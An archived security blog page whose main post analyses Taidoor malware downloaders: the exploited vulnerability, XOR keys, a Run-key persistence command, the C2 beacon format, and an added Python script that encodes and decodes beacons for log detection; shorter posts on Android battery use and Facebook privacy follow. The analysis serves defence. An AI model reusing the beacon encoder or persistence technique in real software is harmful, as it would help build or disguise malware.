TrendLabs Security Intelligence Blog

Archive for December 3rd, 2012
We have been seeing an increase in Taidoor downloaders in the wild. Instead of embedding the Taidoor backdoor itself in the email attachment, the current trend in Taidoor-related attacks is to attach a document that carries a small Trojan whose only job is to download Taidoor.

Based on the sample set we gathered, this technique appears to have been used only this year. For the most part, the delivery method is a socially engineered email with an attachment that exploits the MS12-027 MSCOMCTL.OCX RCE vulnerability (CVE-2012-0158), which is becoming the favorite exploit of several groups. In this case, the targets are mostly Japanese companies and US defense contractors.

Embedded in the document files is a simple downloader. Like Taidoor, this downloader comes with a packer, but instead of RC4 it uses a simple XOR to decrypt the downloader component with the 16-byte (128-bit) hardcoded key below:

• 22 3A 58 40 79 A1 16 11 89 F3 C7 66 37 90 3B 00

Bytes equal to zero are skipped by the XOR loop and left as is.

The component is saved as ntuser.cfg in the %User Profile% folder, and a Run value named NTUCF is created under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run with the data rundll32 %User Profile%\ntuser.cfg,Config to maintain persistence (the .cfg file is loaded as a DLL and its Config export is called).

It then connects to its command-and-control server with an HTTP request of the following form, in which each parameter has a distinct meaning:

    //fc.asp?est=[campaign code]&hn=[computer name]&ha=[ip address]&hm=[mac address]&hv=[path of AV installed]&hb=[system type (64 or 86)]&hp=[proxy]

To decode the parameters, each byte of every parameter value from “hn” onward is XORed with 0x07; the “est” campaign code is sent in the clear. The server is expected to reply with HTTP 200 OK before the downloader fetches a second file named “dw.html”. This contains a link to a .PDF file, which the downloader retrieves and partially decrypts using the same XOR method as its packer, with another hard-coded key:

    • 21 5A 52 46 35 A7 16 11 89 F3 C7 66 37 90 3B 00
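As an added example (not code from the post or from Trend Micro), the Python below reproduces the two XOR layers described above: the 16-byte key loop applied to a carved portion of the downloaded PDF, and the 0x07 obfuscation of the beacon parameters, so that a captured fc.asp request from a proxy log can be decoded. It assumes the key cycles over the buffer, that bytes equal to 0x00 are left untouched (and, as the usual companion rule that makes the loop self-inverse, bytes equal to the current key byte as well), and that parameter values are hex-encoded on the wire; the post states the keys but not these details. The sample PDF and beacon values are constructed.

```python
# Added example, not Trend Micro's code. Assumptions the post does not state:
#  * the 16-byte key is applied cyclically over the buffer;
#  * a byte equal to 0x00 is copied through untouched ("zeroes are skipped"),
#    and so is a byte equal to the current key byte, which would otherwise XOR
#    to zero and be unrecoverable; with both rules the routine is its own inverse;
#  * beacon values from "hn" onward are XORed byte-wise with 0x07 and sent
#    hex-encoded (the post gives the key but not the wire encoding).
from urllib.parse import parse_qs, urlsplit

PACKER_KEY = bytes.fromhex("223A584079A1161189F3C76637903B00")  # key from the post
PDF_KEY = bytes.fromhex("215A524635A7161189F3C76637903B00")     # second key from the post
PARAM_KEY = 0x07
OBFUSCATED = ("hn", "ha", "hm", "hv", "hb", "hp")               # "est" stays in the clear


def xor_skip_zero(data: bytes, key: bytes) -> bytes:
    """Apply the packer's XOR scheme (encrypts and decrypts; it is an involution)."""
    out = bytearray(len(data))
    for i, b in enumerate(data):
        k = key[i % len(key)]
        out[i] = b if b in (0, k) else b ^ k
    return bytes(out)


def carve_payload(blob: bytes, offset: int, length: int, key: bytes = PDF_KEY) -> bytes:
    """Decrypt only a slice of a container (the post says a *portion* of the PDF)."""
    return xor_skip_zero(blob[offset:offset + length], key)


def encode_param(value: str) -> str:
    """Obfuscate one beacon value: XOR every byte with 0x07, then hex-encode (assumed)."""
    return bytes(b ^ PARAM_KEY for b in value.encode()).hex()


def decode_param(hexval: str) -> str:
    """Inverse of encode_param."""
    return bytes(b ^ PARAM_KEY for b in bytes.fromhex(hexval)).decode("utf-8", "replace")


def build_beacon(campaign, hostname, ip, mac, av_path, arch, proxy) -> str:
    """URL path as the downloader would send it to its C2 (constructed field order as in the post)."""
    fields = {"hn": hostname, "ha": ip, "hm": mac, "hv": av_path, "hb": arch, "hp": proxy}
    query = "est=" + campaign + "".join(f"&{k}={encode_param(v)}" for k, v in fields.items())
    return "/fc.asp?" + query


def decode_beacon(url: str) -> dict:
    """Recover the victim fields from a captured beacon (proxy log, pcap, ...)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: (decode_param(v[0]) if k in OBFUSCATED else v[0]) for k, v in qs.items()}


if __name__ == "__main__":
    # Constructed sample: a fake PDF whose encrypted blob starts at offset 8.
    payload = b"MZ\x90\x00\x03\x00\x00\x00stub"
    pdf = b"%PDF-1.4" + xor_skip_zero(payload, PDF_KEY) + b"\n%%EOF"
    assert carve_payload(pdf, 8, len(payload)) == payload
    url = build_beacon("jp01", "WS-01", "10.0.0.5", "00-11-22-33-44-55",
                       "C:\\Program Files\\McAfee", "86", "")
    print(url)
    print(decode_beacon(url))
```

Because the hex-encoded values never contain the raw hostname, AV path or MAC, a plain string search of proxy logs for victim names will miss these beacons; match on the fc.asp path and the fixed parameter names instead, then decode the values.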

It then saves the decrypted code as ~db98.tmp in the Temp folder; this is the Taidoor component. Technically, the payload could be any file, but so far all the samples we have seen point to Taidoor. The Taidoor packer has changed a bit: it now checks for HKLM\SOFTWARE\KasperskyLab in addition to the HKLM\SOFTWARE\McAfee registry key. As described in our earlier analysis, this registry key check determines which process will be used to invoke the executable file. Below are the processes used for each registry key:

• HKLM\SOFTWARE\KasperskyLab – verclsid.exe {malware path and filename}.exe
• HKLM\SOFTWARE\McAfee – services.exe {malware path and filename}.exe
• Default – svchost.exe {malware path and filename}.exe

    Other than that, the main Taidoor binary is the same as the old variants.

Posted in Malware, Targeted Attacks



In this third and final part, I will report the results of our investigation into app-related battery consumption and what the problem actually looks like in practice.

    Android Apps’ Battery Consumption Issue

    According to Trend Micro research, almost 47% of smartphone users in Japan are bothered by their device’s battery longevity.

Dubbed a “PC on your palm”, the smartphone is designed above all for portability, which inadvertently leads to battery resource issues. Traditional feature phones did not have this concern, because their manufacturers were directly responsible for the overall development and quality assurance of every component of the device, from its operating system up to its apps.

With smartphones, users can install third-party apps that are largely independent of the device and its manufacturer. On the positive side, this changed the app market: new players can now participate and release their own apps, which made the market dynamic, with new apps introduced regularly.

The downside is that app development is not aligned with the smartphone devices and their operating systems, which makes quality assurance more complicated and fragmented. Because anyone can join this market, even individuals with insufficient technical knowledge can easily release an app. This could be one reason why “potentially unwanted apps” consume too many device resources.

Resource Consumption of Free Android Apps

Sampling the top 200 free apps (both general apps and games) on Google Play as of August 31, 2012, Trend Micro examined their resource consumption using Trend Micro Mobile App Reputation (MAR). The details of the sample set are as follows:

Measuring battery consumption is not an easy task, since it is determined by a complex combination of apps and hardware. In MAR’s investigation, we defined three levels of battery consumption using combinations of factors such as network bandwidth, memory consumption, hardware used, and so on.

Posted in Mobile



    Last week, many people made posts like this on Facebook:

While this was quickly debunked as entirely untrue, the fact that millions of people made the very same post speaks volumes about how worried people are about their privacy on Facebook.

    It’s probably not helping that Facebook just finished soliciting comments on their new Data Use Policy and their Statement of Rights and Responsibilities. Privacy groups in the US – specifically, the Electronic Privacy Information Center (EPIC) and the Center for Digital Democracy (CDD) – have objected to the changes.

The most significant part of the changes deals with how Facebook is (notionally) governed. In theory, changes to its policies are subject to votes by Facebook users. In practice, the process has been unsuccessful: there have been two previous votes since April 2009 (when the process was announced), and turnout in them was low, with less than one percent of Facebook users participating. The changes would remove the voting process entirely.

    Other changes include making it explicit that information can be shared with Facebook affiliates like Instagram and changes in how messages are handled (instead of a blanket setting on who can and can’t send messages to a user, filters will be offered instead).

    This is all just part of the greater debate surrounding privacy and Facebook. News events like this merely bring it to the forefront of people’s minds. The question really is: how much of our data should be online? How much of our data that is online should be able to be used by the free social media networks that we’re part of?

Posted in Social



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice